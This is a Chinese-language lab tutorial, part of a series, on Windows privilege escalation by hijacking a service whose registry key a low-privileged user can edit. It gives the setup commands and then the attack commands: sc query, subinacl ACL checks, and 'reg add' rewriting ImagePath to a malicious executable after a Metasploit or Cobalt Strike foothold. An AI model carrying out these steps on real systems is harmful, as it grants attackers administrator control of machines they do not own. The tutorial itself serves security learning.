操作系统权限提升(七)之系统错误配置-不安全注册表提权
系列文章
操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权
操作系统权限提升(六)之系统错误配置-不安全的服务提权
注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!
不安全注册表提权
不安全注册表提权的原理
Windows的服务路径存储在Windows的注册表中,若注册表配置不当,当攻击者可以发现使用低权限可以更改注册表的选项的时候,就可以导致提权,可以将 imagepath 修改成恶意的文件,重启导致提权
提权环境准备
1、新建立一个服务,test
sc create test binpath= "C:\1.exe"
2、打开注册表给该文件权限
或者用工具
shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /grant=apache=f
不安全注册表提权实战
1、先使用MSF或者CS上线靶机
2、查询计算机中的所有服务
sc query type= all state= all |findstr /i service_name.* |more
3、使用subinacl进行查询提权
shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /display
4、查询该服务的 imagepath 值
reg query HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test /v imagepath
5、查看上传的cs的恶意程序文件路劲并记录下来
6、替换该文件为恶意的文件或者修改文件的路径
reg add "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\apache\Desktop\1.exe" /f
7、查询是否替换
reg query HKEY_LOCAL_MACHINE\system\ControlSet001\services\test /v imagepath
这里可以看到我们的服务路劲已经被篡改了
8、这个时候apache是没有权限启动服务的,需要管理员重启电脑
这里我们模拟管理员启动这个服务
sc strat test
9、提权成功
